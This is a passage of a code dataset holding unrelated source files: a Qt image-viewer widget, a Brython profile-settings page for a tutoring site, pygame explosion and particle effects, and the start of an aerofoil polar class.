self.tolerance:\r\n F_record = np.vstack((F_record, F_ext))\r\n U_k += d_U\r\n U_record = np.vstack((U_record, U_k))\r\n sf_record = np.vstack((sf_record, sig[:, :, 1].flatten()))\r\n eps_record.append(np.copy(eps))\r\n sig_record.append(np.copy(sig))\r\n t_record.append(t_n1)\r\n break\r\n k += 1\r\n step_flag = 'corrector'\r\n\r\n t_n = t_n1\r\n return U_record, F_record, sf_record, np.array(t_record), np.array(eps_record), np.array(sig_record)\r\n\r\n\r\nif __name__ == '__main__':\r\n\r\n mat = MATSEval()\r\n\r\n fet = FETS1D52ULRH(A_m=120. * 13. - 9. * 1.85,\r\n P_b=10.,\r\n A_f=9. * 1.85)\r\n\r\n ts = TStepper(mats_eval=mat,\r\n fets_eval=fet)\r\n\r\n ts.L_x = 400.\r\n ts.n_e_x = 20\r\n\r\n n_dofs = ts.domain.n_dofs\r\n\r\n d_array = np.array(\r\n [0., 2, 0, 4, 0, 5])\r\n\r\n# d_array = np.array([0., 2, 3, 4, 5])\r\n\r\n dd_arr = np.abs(np.diff(d_array))\r\n x = np.hstack((0, np.cumsum(dd_arr) / sum(dd_arr)))\r\n from scipy.interpolate import interp1d\r\n tf = interp1d(x, d_array)\r\n\r\n ts.bc_list = [BCDof(var='u', dof=n_dofs - 2, value=0.0),\r\n BCDof(var='u', dof=n_dofs - 1, value=1., time_function=tf)]\r\n\r\n tl = TLoop(ts=ts, d_t=0.002)\r\n\r\n U_record, F_record, sf_record, t_record, eps_record, sig_record = tl.eval()\r\n n_dof = 2 * ts.domain.n_active_elems + 1\r\n plt.plot(U_record[:, n_dof], F_record[\r\n :, n_dof] / 1000., label='loaded end')\r\n# plt.plot(U_record[:, 1], F_record[:, n_dof] / 1000., label='free end')\r\n\r\n plt.xlabel('displacement [mm]')\r\n plt.ylabel('pull-out force [KN]')\r\n\r\n plt.legend(loc='best')\r\n\r\n plt.figure()\r\n plt.plot(eps_record[:, -1, -1, 1], sig_record[:, -1, -1, 1])\r\n\r\n plt.show()\r\n\r\n plt.show()\r\n","sub_path":"cbfe/casestudies/matseval_damage.py","file_name":"matseval_damage.py","file_ext":"py","file_size_in_byte":12054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"473512091","text":"import webapp2\nimport os\nimport random\n\nfrom google.appengine.ext.webapp import template\nfrom google.appengine.api import users\nfrom google.appengine.ext import db\nfrom google.appengine.api import memcache\n\nclass Event(db.Model):\n name = db.StringProperty()\n date = db.StringProperty()\n start = db.StringProperty()\n end = db.StringProperty()\n sun = db.StringProperty()\n mon = db.StringProperty()\n tues = db.StringProperty()\n wed = db.StringProperty()\n thurs = db.StringProperty()\n fri = db.StringProperty()\n sat = db.StringProperty()\n attendance = db.StringProperty()\n \nclass EWFHelper(): #Event With Friends Helper class; stores data concerning each friend\n name = ''\n invited = ''\n priority = 0\n availabilities = {}\n def __init__(self, name, invited, priority):\n self.name = name\n self.invited = invited\n self.priority = priority\n \nclass Increment():\n date = ''\n time = ''\n def __init__(self, date, time):\n self.date = date\n self.time = time\n \nclass Option():\n date = ''\n time = ''\n finished = ''\n score = 0\n def __init__(self, date, time, finished, score):\n self.date = date\n self.time = time\n self.finished = finished\n self.score = score\n \n \nclass User(db.Model):\n name = db.StringProperty()\n \nclass Friend(db.Model):\n name = db.StringProperty()\n \nclass Envitation(db.Model):\n sender = db.StringProperty()\n date = db.StringProperty()\n start = db.StringProperty()\n end = db.StringProperty()\n eName = db.StringProperty()\n \nclass Frinvitation(db.Model):\n sender = db.StringProperty()\n \nclass MainPage(webapp2.RequestHandler) :\n #the first 
thing that happens\n def get(self) :\n user = users.get_current_user()\n if user:\n current = User(key_name=user.nickname())\n current.name = user.nickname()\n current.put()\n nickname = 'Well hello there, ' + user.nickname() + '!'\n template_values = {'message' : nickname, 'indexNumber1' : 1}\n self.response.out.write(template.render('HTML/newIndex.html', template_values))\n else:\n self.redirect(users.create_login_url(self.request.uri))\n \nclass CreateEvent(webapp2.RequestHandler) : #runs when you click the 'Create Event' button within the sidebar Create Event button\n def get(self) :\n user = users.get_current_user() #get the current user\n if not user:\n self.redirect(users.create_login_url(self.request.uri))\n name = self.request.get('eventname') #get all the passed-in values\n date = self.request.get('eventdate')\n start = self.request.get('eventstarttime')\n end = self.request.get('eventendtime')\n attendance = self.request.get('likelihood')\n sunday = self.request.get('Sunday')\n monday = self.request.get('Monday')\n tuesday = self.request.get('Tuesday')\n wednesday = self.request.get('Wednesday')\n thursday = self.request.get('Thursday')\n friday = self.request.get('Friday')\n saturday = self.request.get('Saturday')\n if (not name or not date or not start or not end):\n thing = 'Event Incomplete. Event Not Created.'\n template_values = {'message': thing, 'indexNumber1': 1}\n self.response.out.write(template.render('HTML/newIndex.html', template_values))\n elif (\"'\" in name):\n thing = \"Event not created. Event name must not contain an apostrophe\"\n template_values = {'message': thing, 'indexNumber1': 1}\n self.response.out.write(template.render('HTML/newIndex.html', template_values))\n elif (\">\" in name):\n thing = \"Event not created. Event name must not contain a greater than symbol\"\n template_values = {'message': thing, 'indexNumber1' : 1}\n self.response.out.write(template.render('HTML/newIndex.html', template_values))\n else:\n stupidDate = verifyDateIsNotStupid(date)\n stupidStart = verifyTimeIsNotStupid(start)\n stupidEnd = verifyTimeIsNotStupid(end)\n stupidAttendance = verifyAttendanceIsNotStupid(attendance)\n if (stupidDate == \"stupid\"):\n thing = \"Date format improper. Proper format for dates is: YYYY-MM-DD\"\n template_values = {'message': thing, 'indexNumber1': 1}\n self.response.out.write(template.render('HTML/newIndex.html', template_values))\n elif (stupidStart == \"stupid\" or stupidEnd == \"stupid\"):\n thing = \"Time format improper. Proper format for times is: HH:MM\"\n template_values = {'message': thing, 'indexNumber1': 1}\n self.response.out.write(template.render('HTML/newIndex.html', template_values))\n elif (stupidAttendance == \"stupid\"):\n thing = \"Attendance format improper. Attendance must be an integer 0 - 100\"\n template_values = {'message': thing, 'indexNumber1': 1}\n self.response.out.write(template.render('HTML/newIndex.html', template_values))\n elif (start >= end):\n thing = \"Event not created. 
Start time must be before end time.\"\n template_values = {'message': thing, 'indexNumber1': 1}\n self.response.out.write(template.render('HTML/newIndex.html', template_values))\n else:\n current_k = db.Key.from_path('User', user.nickname()) #get the current user's key\n current = db.get(current_k) #get the db entity corresponding to the current user\n thekey = current.key() #get the current user's key...possibly equivalent to two lines up\n event = Event(parent=thekey) #so that this event will be a child of the current user\n event.name = name #set the event's properties\n event.date = date\n event.start = start\n event.end = end\n event.attendance = attendance\n event.sun = sunday\n event.mon = monday\n event.tues = tuesday\n event.wed = wednesday\n event.thurs = thursday\n event.fri = friday\n event.sat = saturday\n event.put() #add the event to the database\n thing = 'Event Created' #just a little message confirming it worked\n template_values = {'message' : thing, 'indexNumber1' : 1}\n self.response.out.write(template.render('HTML/newIndex.html', template_values)) #give back the main page again\n \nclass LogIn(webapp2.RequestHandler) :\n #never happens, as the log in button no longer exists\n def post(self) :\n self.response.out.write('Hey, you tried to log in!')\n \nclass ManageEvents(webapp2.RequestHandler): #when you click the 'Manage Events' button in the sidebar\n def get(self):\n user = users.get_current_user()\n current_k = db.Key.from_path('User', user.nickname()) #get the current user's key\n current = db.get(current_k) #get the db entity corresponding to the current user\n thekey = current.key() #get the current user's key...possibly equivalent to two lines up\n q = Event.all() #q is now all Event entities\n q.ancestor(thekey) #q is now filtered to only be Event entities of the current user\n thing = \"Events:\\n\"\n # for p in q: #for each of the user's events\n # thing += (p.name +\"\\n\")\n # event_k = db.Key.from_path('User', user.nickname(), 'Event', 1)\n # event = db.get(event_k)\n # thing = event.name\n template_values = {'events' : q, 'indexNumber2' : 2} #we'll pass the user's events to the template\n self.response.out.write(template.render('HTML/newIndex.html', template_values)) #now we write to the index2 template\n \nclass DeleteEvent(webapp2.RequestHandler): #when you click a delete event button from within 'Manage Events'\n def get(self):\n thekey = self.request.get('thekey') #thekey (key for the Event entity) is passed in with a hidden input in index2.html\n db.delete(thekey) #delete it\n thing = 'Event Deleted'\n template_values = {'message' : thing, 'indexNumber1' : 1}\n self.response.out.write(template.render('HTML/newIndex.html', template_values)) #back to index.html\n \nclass Friends(webapp2.RequestHandler): #when you click the 'Friends' button in the sidebar (or one of the 'Back' buttons)\n def get(self):\n user = users.get_current_user()\n current_k = db.Key.from_path('User', user.nickname()) #get the current user's key\n current = db.get(current_k) #get the db entity corresponding to the current user\n thekey = current.key() #get the current user's key...possibly equivalent to two lines up\n q = Friend.all() #q is now all Friend entities\n q.ancestor(thekey) #q is now filtered to only be Friend entities of the current user\n thing = 'You hit the Friends button'\n template_values = {'friends' : q, 'indexNumber3' : 3}\n self.response.out.write(template.render('HTML/newIndex.html', template_values))\n \nclass FrinvitationSend(webapp2.RequestHandler): #when 
you send a friend invitation\n def get(self):\n recipient = self.request.get('addfriendusername')\n recipient_k = db.Key.from_path('User', recipient)\n thing = recipient_k\n derp = db.get(recipient_k)\n if (derp):\n user = users.get_current_user()\n if (recipient == user.nickname()):\n template_values = {'message' : \"You can't be friends with yourself\", 'indexNumber1' : 1}\n self.response.out.write(template.render('HTML/newIndex.html', template_values))\n frinvitation = Frinvitation(parent=recipient_k, key_name = user.nickname()) #so that this Frinvitation will be a child of the recipient\n frinvitation.sender = user.nickname()\n frinvitation.put()\n template_values = {'message' : 'Invitation sent to ' + recipient, 'indexNumber1' : 1}\n self.response.out.write(template.render('HTML/newIndex.html', template_values))\n else:\n template_values = {'message' : recipient + ' is not a valid username', 'indexNumber1' : 1}\n self.response.out.write(template.render('HTML/newIndex.html', template_values))\n \nclass DisplayFrinvitations(webapp2.RequestHandler): #when you click the 'Friend Invitations' button\n def get(self):\n user = users.get_current_user()\n current_k = db.Key.from_path('User', user.nickname()) #get the current user's key\n current = db.get(current_k) #get the db entity corresponding to the current user\n thekey = current.key() #get the current user's key...possibly equivalent to two lines up\n q = Frinvitation.all() #q is now all Frinvitation entities\n q.ancestor(thekey) #q is now filtered to only be Frinvitation entities of the current user\n thing = 'Here are your friend invitations'\n template_values = {'frinvitations' : q, 'indexNumber4' : 4}\n self.response.out.write(template.render('HTML/newIndex.html', template_values))\n \nclass Accept(webapp2.RequestHandler):\n def get(self):\n user = users.get_current_user()\n sender = self.request.get('sender')\n thekey = self.request.get('thekey')\n sender_k = db.Key.from_path('User', sender)\n recipient_k = db.Key.from_path('User', user.nickname())\n senderObject = Friend(parent=sender_k, key_name = user.nickname())\n senderObject.name = user.nickname()\n senderObject.put()\n recipientObject = Friend(parent=recipient_k, key_name = sender)\n recipientObject.name = sender\n recipientObject.put()\n db.delete(thekey)\n thing = 'Invitation Accepted'\n template_values = {'message' : thing, 'indexNumber1' : 1}\n self.response.out.write(template.render('HTML/newIndex.html', template_values))\n \nclass Ignore(webapp2.RequestHandler):\n def get(self):\n thekey = self.request.get('thekey') #thekey (key for the Frinvitation entity) is passed in with a hidden input in index4.html\n db.delete(thekey) #delete it\n thing = 'Wow what a jerk'\n template_values = {'message' : thing, 'indexNumber1' : 1}\n self.response.out.write(template.render('HTML/newIndex.html', template_values))\n \nclass Unfriend(webapp2.RequestHandler):\n def get(self):\n user = users.get_current_user()\n name2 = self.request.get('name2')\n thekey = self.request.get('thekey')\n friend_k = db.Key.from_path('User', name2, 'Friend', user.nickname())\n db.delete(thekey)\n db.delete(friend_k)\n thing = name2 + ' has been unfriended'\n template_values = {'message' : thing, 'indexNumber1' : 1}\n self.response.out.write(template.render('HTML/newIndex.html', template_values))\n \nclass LogOut(webapp2.RequestHandler) :\n #when you click the 'Log Out' button in the sidebar\n def post(self) :\n self.redirect(users.create_logout_url('/'))\n \nclass AjaxManageEvents(webapp2.RequestHandler):\n 
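# Renders the signed-in user's events for the requested date (or all of them
# when the client sends 'null') as HTML table rows. eventOccursOnDate() is a
# helper defined elsewhere in this app; a rough sketch of the repeat check it
# implies, assuming 'YYYY-MM-DD' date strings (hypothetical, for illustration
# only, not the app's actual implementation):
#
#   import datetime
#   def _occurs_on(event, target):  # hypothetical
#       d = datetime.date(*[int(s) for s in target.split('-')])
#       flags = [event.mon, event.tues, event.wed, event.thurs,
#                event.fri, event.sat, event.sun]  # datetime.weekday() order
#       return event.date == target or bool(flags[d.weekday()])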
def post(self):\n user = users.get_current_user()\n text = ''\n current_k = db.Key.from_path('User', user.nickname()) #get the current user's key\n current = db.get(current_k) #get the db entity corresponding to the current user\n thekey = current.key() #get the current user's key...possibly equivalent to two lines up\n target = self.request.get('target')\n q = Event.all() #q is now all Event entities\n q.ancestor(thekey)\n allEvents = 0\n if (not (target == 'null')): #if there's a target\n #q.filter(\"date =\", target) #also filter the events by the target date\n text += \"Events for: \" + target\n else:\n text += \"All Events\"\n allEvents = 1\n text += ''\n for p in q:\n if (eventOccursOnDate(p, target) == \"yes\" or allEvents == 1): #if the event and the target date overlap (taking repeats into consideration)\n text += ('')\n text += ('')\n text += ('')\n text += ('')\n text += ('')\n text += ('')\n text += (''\n key2 = str(p.key())\n text += ''\n text +='
Date Start End Likelihood Repeat Delete
' + p.name + '
' + p.date + '' + p.start + '' + p.end + '' + p.attendance + '%')\n if p.sun:\n text += 'Su'\n if p.mon:\n text += 'Mo'\n if p.tues:\n text += 'Tu'\n if p.wed:\n text += 'We'\n if p.thurs:\n text += 'Th'\n if p.fri:\n text += 'Fr'\n if p.sat:\n text += 'Sa'\n text += '')\n text += '
' \n self.response.out.write(text)\n \nclass AjaxDeleteEvent(webapp2.RequestHandler):\n def post(self):\n thekey = self.request.get('thekey')\n db.delete(thekey)\n self.response.out.write('Event Deleted')\n \nclass AjaxFriends(webapp2.RequestHandler):\n def post(self):\n text = ''\n user = users.get_current_user()\n current_k = db.Key.from_path('User', user.nickname()) #get the current user's key\n current = db.get(current_k) #get the db entity corresponding to the current user\n thekey = current.key() #get the current user's key...possibly equivalent to two lines up\n q = Friend.all() #q is now all Friend entities\n q.ancestor(thekey) #q is now filtered to only be Friend entities of the current user\n text += ''\n text += ''\n for p in q:\n text += ('

' + p.name + '

')\n key2 = str(p.key())\n text += '\" #back to Create Event page\n text += \"
\" #form with action for handler on line 433\n text += \"\"\n text += \"\"\n text += \"\"\n text += \"\"\n text += \"\"\n text += \"\"\n text += \"\"\n text += \"\"\n text += \"\" #various other inputs\n text += \"\"\n text += \"\"\n text += \"\"\n text += \"\"\n text += \"\"\n text += \"\"\n for p in q:\n text += \"\" #gives a checkbox and a priority select menu for each friend\n text += \"\"\n text += \"\"\n text += \"\"\n text += \"
Event name:
Duration in hours: Duration in minutes:
Earliest start: Latest start:
Between\"\n text += \"and
Friends to invite:
\" + p.name + \"Priority:
\"\n text += \"\"\n text += \"
\"\n self.response.out.write(text)\n \nclass CreateEventWithFriends(webapp2.RequestHandler): #the thing that actually recommends the times\n def post(self):\n text = '' #for debugging purposes\n friendsInvited = '' #pass this as a big string to the html, which will pass it to the JavaScript, which will pass it back here\n user = users.get_current_user()\n if not user:\n self.redirect(users.create_login_url(self.request.uri))\n current_k = db.Key.from_path('User', user.nickname()) #get the current user's key\n current = db.get(current_k) #get the db entity corresponding to the current user\n thekey = current.key() #get the current user's key...possibly equivalent to two lines up\n q = Friend.all() #q is now all Friend entities\n q.ancestor(thekey) #q is now filtered to only be Friend entities of the current user\n eName = self.request.get('eventName') #get all the passed-in values\n hours = self.request.get('hours')\n minutes = self.request.get('minutes')\n earliestStart = self.request.get('earliestStart')\n latestStart = self.request.get('latestStart')\n first = self.request.get('first')\n last = self.request.get('last')\n #invited = list()\n #priority = list()\n #name = list()\n #uMap = list() #a list of 'unavailability maps' for each friend\n helpers = list()\n #index = 0\n #index2 = 0\n invitedCount = 0\n stupidDate = verifyDateIsNotStupid(first)\n stupidDate2 = verifyDateIsNotStupid(last)\n stupidStart = verifyTimeIsNotStupid(earliestStart)\n stupidEnd = verifyTimeIsNotStupid(latestStart)\n if (stupidDate == \"stupid\" or stupidDate2 == \"stupid\"):\n thing = \"Date format improper. Proper format for dates is: YYYY-MM-DD\"\n template_values = {'message': thing, 'indexNumber1': 1}\n self.response.out.write(template.render('HTML/newIndex.html', template_values))\n elif (stupidStart == \"stupid\" or stupidEnd == \"stupid\"):\n thing = \"Time format improper. Proper format for times is: HH:MM\"\n template_values = {'message': thing, 'indexNumber1': 1}\n self.response.out.write(template.render('HTML/newIndex.html', template_values))\n else:\n for p in q:\n #name.append(p.name) #for each friend, their name, invitation status, and priority should be at matching indexes\n #invited.append(self.request.get(p.name))\n #priority.append(self.request.get(p.name +'priority'))\n #index += 1 #a count of the total number of friends\n if (self.request.get(p.name) == 'yes'): #if the friend was invited\n helpers.append(EWFHelper(p.name, self.request.get(p.name), self.request.get(p.name+'priority')))\n if (invitedCount > 0): #if not the first friend we're adding to the string\n friendsInvited += '?' #put a question mark in front of the name\n friendsInvited += p.name #add the name to the string\n invitedCount += 1\n \n if (not eName or not earliestStart or not latestStart or not first or not last): #if something was left null\n thing = 'Event Incomplete. 
Event Not Created.'\n template_values = {'message': thing, 'indexNumber1': 1}\n self.response.out.write(template.render('HTML/newIndex.html', template_values))\n elif (invitedCount == 0): #if no friends were invited\n thing = 'Must Invite At Least 1 Friend'\n template_values = {'message': thing, 'indexNumber1': 1}\n self.response.out.write(template.render('HTML/newIndex.html', template_values))\n elif (\"'\" in eName): #if there's an apostrophe in the event name\n thing = \"Event name must not contain an apostrophe\"\n template_values = {'message': thing, 'indexNumber1' : 1}\n self.response.out.write(template.render('HTML/newIndex.html', template_values))\n elif (\">\" in eName):\n thing = \"Event name must not contain a greater than sign\"\n template_values = {'message': thing, 'indexNumber1' : 1}\n self.response.out.write(template.render('HTML/newIndex.html', template_values))\n else: #carry on\n totalIncrements = list()\n increments = list()\n validStarts = list()\n incrementCount = 0\n validStartsCount = 0\n span = daysBetween(first, last)\n date = first\n earliestInMinutes = toMinutes(earliestStart)\n latestInMinutes = toMinutes(latestStart)\n herp = int(hours)\n derp = int(minutes)\n durationInMinutes = ((herp*60)+(derp))\n start = earliestInMinutes\n end = (latestInMinutes + durationInMinutes) #end is latest start + duration, all in minutes\n if (end > 1440): #if the event extends into the next day\n thing = 'Events Can Not Extend Beyond Midnight'\n template_values = {'message': thing, 'indexNumber1': 1}\n self.response.out.write(template.render('HTML/newIndex.html', template_values))\n elif (span == -1): #if the start and end dates are flipped (or over 100 years apart)\n thing = 'End Date Must Come After Start Date'\n template_values = {'message': thing, 'indexNumber1': 1}\n self.response.out.write(template.render('HTML/newIndex.html', template_values))\n elif (earliestInMinutes >= latestInMinutes):\n thing = 'Latest Start must be after Earliest Start'\n template_values = {'message': thing, 'indexNumber1': 1}\n self.response.out.write(template.render('HTML/newIndex.html', template_values))\n elif (not(earliestInMinutes % 5 == 0) or not(latestInMinutes % 5 == 0)): #start times are not multiples of 5\n thing = 'Start and End Times must end in multiples of 5 minutes'\n template_values = {'message': thing, 'indexNumber1': 1}\n self.response.out.write(template.render('HTML/newIndex.html', template_values))\n else: #carry on\n k = 0\n \n #this loop gets ALL increments and loads them into the totalIncrements list\n while (k <= span): #for each day in the span\n time = start #time is earliest start, in minutes\n while (time <= end): #between the earliest possible start and latest possible end\n time2 = backToString(time) #turn the minutes back into a date string\n totalIncrements.append(Increment(date, time2)) #add an increment corresponding to this date and time\n time += 15 #next increment will be 15 minutes later\n incrementCount += 1\n date = incrementDay(date) #go to next day\n k += 1\n \n #this loop initializes each invited friend's availabilities\n for f in helpers: #for each invited friend\n for inc in totalIncrements: #for each increment\n f.availabilities[inc.date+inc.time] = 1.0 #initialize its availability to 1\n \n #this loop reduces each invited friend's availabilities based on their events\n for f in helpers: #for each invited friend\n r_k = db.Key.from_path('User', f.name)\n curr = db.get(r_k)\n thekey2 = curr.key()\n r = Event.all()\n r.ancestor(thekey2) #r is now all of 
the friend's events\n for s in r: #for each of the invited friend's events\n for inc in totalIncrements: #for each increment\n if incrementWithinEvent(inc, s) == 'yes': #if the increment falls within the event\n f.availabilities[inc.date+inc.time] -= (float(s.attendance) * .01) #reduce inc's availability by event's attendance\n if f.availabilities[inc.date+inc.time] < 0: #if availability is now negative\n f.availabilities[inc.date+inc.time] = 0 #just set it to zero\n i = 0\n date = first\n \n #this loop puts all possible start times into the validStarts list\n while (i <= span): #for each day in the span\n time = start #time is earliest start, in minutes\n while (time <= latestInMinutes): #between the earliest possible start and latest possible start\n time2 = backToString(time) #turn the minutes back into a date string\n validStarts.append(Increment(date, time2)) #add an increment corresponding to this date and time\n time += 15 #next increment will be 15 minutes later\n validStartsCount += 1\n date = incrementDay(date) #go to next day\n i += 1\n \n options = list()\n #this is the ultimate loop that finally puts it all together\n for w in validStarts: #for each possible start time\n increments = incrementsForStart(w, durationInMinutes) #get all increments for the event for the start time\n #text += 'Start: ' + w.date + ' ' + w.time + ' '\n oScore = 0\n moScore = 0 #maximum overall score\n for f in helpers: #for each invited friend\n aScore = 0\n maScore = 0 #maximum availability score\n for inc in increments: #for each increment\n iScore = f.availabilities[inc.date+inc.time] #get the friend's availability at this increment\n aScore += iScore #add it to the friend's overall availability score\n maScore += 1 #full availability\n pScore = aScore * int(f.priority) #scale overall availability score by friend's priority\n mpScore = maScore * int(f.priority)\n oScore += pScore #add pScore to start time's overall score\n moScore += mpScore\n percentScore = 100*(oScore/moScore)\n wmin = toMinutes(w.time) #w's start time\n finishedmin = wmin + durationInMinutes #w's end time, in minutes\n finished = backToString(finishedmin) #w's end time, as a string\n options.append(Option(w.date, w.time, finished, percentScore)) #add an option for start w with its calculated overall score\n \n options.sort(key=lambda x: x.score, reverse=True)\n #for o in options:\n #text += 'Option: ' + o.date + ' ' + o.time + ' ' + str(o.score) + ' '\n template_values = {'message' : text, 'options' : options, 'indexNumber1' : 1, 'sender' : user.nickname(), 'friendsinvited' : friendsInvited, 'ename': eName}\n self.response.out.write(template.render('HTML/newIndex.html', template_values)) #give back the main page again\n \nclass AjaxEnvitations(webapp2.RequestHandler): #displays all Envitations\n def post(self):\n text = \"\"\n user = users.get_current_user()\n current_k = db.Key.from_path('User', user.nickname()) #get the current user's key\n current = db.get(current_k) #get the db entity corresponding to the current user\n thekey = current.key() #get the current user's key...possibly equivalent to two lines up\n #q = memcache.get(thekey)\t\t\t\t#get q from the memcache\n #if q is None:\n q = Envitation.all() #q is now all Envitation entities\n q.ancestor(thekey) #q is now filtered to only be Envitation entities of the current user\n #memcache.add(thekey,q)\t\t\t\t#add q to the memcache under the key thekey\n count = 0\n for p in q:\n #for each Envitation\n count += 1\n text += ('

From: ' + p.sender + '

')\n #show its information\n text += '

Event: ' + p.eName + '

'\n text += '

Date: ' + p.date + '

'\n text += '

Start: ' + p.start + '

'\n text += '

End: ' + p.end + '

'\n key2 = str(p.key())\n text += '\n\n\n\"\"\"\n\nteacher_profile_form_start = \"\"\"\n
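<!-- Template note: this markup is rendered with Python's
     str.format(**teacher_details) in load_settings_page further down, so any
     {name} placeholder must match a key of that dict (e.g. {icon},
     {max_hours}, {phone_number}), and a literal brace in the HTML or inline
     CSS would have to be doubled as {{ }}. -->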
\nCreate Session\n
\n\n
\n
\n

Account Settings

\n\n \n \n\n \n \n \n \n \n\n \n \n\n \n \n\n \n \n\n \n
\n
\n\"\"\"\n\nteacher_profile_subject_template = \"\"\"\n \n \n
\n\"\"\"\n\nteacher_profile_subject_template_checked = \"\"\"\n \n \n
\n\"\"\"\n\nteacher_profile_form_end = \"\"\"\n \n\n \n \n\"\"\"\n\nnull = \"\"\"\n \n \n\"\"\"\n\nclaim_teacher_button = \"\"\"\n

\n
\n\n\n
\n\"\"\"\n\ndef get_cookies():\n cookie_list = document.cookie.split('; ')\n cookie_dict = dict()\n for c in cookie_list:\n if c == \"\":\n continue\n cookie_tuple = c.split('=')\n cookie_dict.update({cookie_tuple[0]: cookie_tuple[1].replace('\"', '')})\n return cookie_dict\n\ndef deserialize(obj_str):\n return javascript.JSON.parse(obj_str)\n\nasync def fetch_api(endpoint=\"/api/search-times\", params={}):\n \"\"\"\n Fetches stuff from any API endpoint\n \"\"\"\n req = await aio.get(URL + endpoint, data=params)\n response = deserialize(req.data)\n\n return response\n\nasync def fetch_teachers():\n response_dict = await fetch_api(\"/api/teachers\")\n return response_dict\n\nasync def fetch_api(endpoint=\"/api/search-times\", params={}):\n \"\"\"\n Fetches stuff from any API endpoint\n \"\"\"\n params.update(get_cookies())\n\n req = await aio.get(URL + endpoint, data=params)\n response = deserialize(req.data)\n\n return response\n\nasync def rename_teacher():\n # await fetch_api('/api/claim-teacher')\n succeeded = await fetch_api('/api/make-teacher', {\"pass\": document['teacher-secret'].value})\n if succeeded:\n alert(\"You are now a teacher!\")\n await load_settings_page()\n else:\n alert(\"Wrong Password!\")\n\ndef rename_teacher_run(vars):\n aio.run(rename_teacher())\n\ndef document_get(value):\n try:\n return document[value]\n except:\n return \"\"\n\nasync def submit_form():\n is_teacher = await check_teacher()\n\n if is_teacher:\n subjects_str = \"\"\n\n params = dict()\n\n for d in document.select(\".form-checkbox\"):\n if d.checked:\n subjects_str += d.value + \"|\"\n\n subjects_str = subjects_str[:-1]\n\n params.update({\"subjects\": subjects_str})\n\n bio = document['bio'].value\n phone_number = document['phone_number'].value\n\n first_name = document['first_name'].value\n last_name = document['last_name'].value\n\n zoom = document['zoom'].value\n max_hours = document['max_hours'].value\n\n icon = document['icon'].value\n\n if first_name != \"\": params.update({\"first_name\": first_name})\n if last_name != \"\": params.update({\"last_name\": last_name})\n if bio != \"\": params.update({\"bio\": bio})\n if zoom != \"\": params.update({\"zoom_id\": zoom})\n if max_hours != \"\": params.update({\"max_hours\": int(max_hours)})\n if phone_number != \"\": params.update({\"phone_number\": phone_number})\n if icon != \"\": params.update({\"icon\": icon})\n\n await fetch_api(\"/api/edit-teacher\", params)\n else:\n params = dict()\n\n first_name = document['first_name'].value\n last_name = document['last_name'].value\n\n wechat = document['wechat'].value\n phone_number = document['phone_number'].value\n\n if first_name != \"\": params.update({\"first_name\": first_name})\n if last_name != \"\": params.update({\"last_name\": last_name})\n if wechat != \"\": params.update({\"wechat\": wechat})\n if phone_number != \"\": params.update({\"phone_number\": phone_number})\n\n await fetch_api(\"/api/edit-student\", params)\n\n alert(\"Your profile has been updated!\")\n\ndef submit_form_run(vars):\n aio.run(submit_form())\n\nasync def load_settings_page():\n \"\"\"\n Loads setting page and checks if student or teacher\n \"\"\"\n is_teacher = await check_teacher()\n # is_teacher = check_teacher()\n if is_teacher:\n teacher_details = await fetch_api('/api/get-teacher-by-email')\n\n if 'icon' not in teacher_details:\n teacher_details['icon'] = 'https://github.com/identicons/jasonlong.png'\n\n if 'max_hours' not in teacher_details:\n teacher_details['max_hours'] = 1\n\n if 'phone_number' not in 
teacher_details:\n teacher_details['phone_number'] = '000-000-0000'\n\n document['user-settings'].html = teacher_profile_form_start.format(**teacher_details)\n teacher_subjects = teacher_details['subjects'].split(\"|\")\n\n for subject in SUBJECTS:\n if subject in teacher_subjects:\n document['inner-form'].html += teacher_profile_subject_template_checked.format(subject=subject)\n else:\n document['inner-form'].html += teacher_profile_subject_template.format(subject=subject)\n\n document['inner-form'].html += teacher_profile_form_end.format(**teacher_details)\n\n document['save-settings'].bind(\"mousedown\", submit_form_run)\n else:\n student_details = await fetch_api('/api/get-student-by-email')\n\n # alert(student_details)\n\n if 'first_name' not in student_details:\n student_details['first_name'] = \"\"\n if 'last_name' not in student_details:\n student_details['last_name'] = \"\"\n if 'phone_number' not in student_details:\n student_details['phone_number'] = \"\"\n if 'wechat' not in student_details:\n student_details['wechat'] = \"\"\n\n document['user-settings'].html = student_profile_form.format(**student_details)\n document['user-settings'].html += claim_teacher_button\n document['save-settings'].bind(\"mousedown\", submit_form_run)\n\n document['claim-teacher'].bind(\"mousedown\", rename_teacher_run)\n\n\nasync def check_teacher():\n return await fetch_api(\"/api/check-teacher\")\n # return await fetch_api(\"/api/make-teacher\")\n\naio.run(load_settings_page())","sub_path":"static/compiled/profile.py","file_name":"profile.py","file_ext":"py","file_size_in_byte":8635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"16729942","text":"import pygame, random\n\nclass Explosion(pygame.sprite.Sprite):\n def __init__(self, data):\n super().__init__()\n self.surface = data[\"surface\"]\n self.images = data[\"images\"]\n self.image = self.images[0]\n self.rect = self.image.get_rect()\n self.rect.centerx = data[\"coords\"][0]\n self.rect.bottom = data[\"coords\"][1]\n # variables for animation\n self.frame = 0\n self.frame_timer = pygame.time.get_ticks()\n self.frame_delay = 100\n # Play the explosion sound effect\n self.chosen_sfx = random.choice(data[\"explosions_sfx\"])\n self.chosen_sfx.play()\n\n def update(self):\n now = pygame.time.get_ticks()\n if now - self.frame_timer > self.frame_delay:\n self.frame_timer = now\n self.frame += 1\n\n if self.frame == 4:\n self.kill()\n else:\n center = self.rect.center\n self.image = self.images[self.frame]\n self.rect = self.image.get_rect()\n self.rect.center = center\n\nclass Particle():\n def __init__(self, window, win_res, x, y, colors):\n self.window = window\n self.win_res = win_res\n self.x = x\n self.y = y\n self.spdx = random.choice([num for num in range(-8,8) if num not in [-1,0,1]])\n self.spdy = random.choice([num for num in range(-8,8) if num not in [-1,0,1]])\n self.size = random.choice([4,8])\n self.color = random.choice(colors)\n\n def update(self):\n self.x += self.spdx\n self.y += self.spdy\n pygame.draw.rect(self.window, self.color, (self.x, self.y, self.size, self.size))\n","sub_path":"DEV/old/effects.py","file_name":"effects.py","file_ext":"py","file_size_in_byte":1683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"26729270","text":"import numpy as np\n# import sharpy.utils.algebra as algebra\nfrom sharpy.utils.constants import deg2rad\n\n\nclass polar(object):\n\n def __init__(self):\n\n self.table = None\n 
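# Table layout, as consumed by get_coefs() below: columns are
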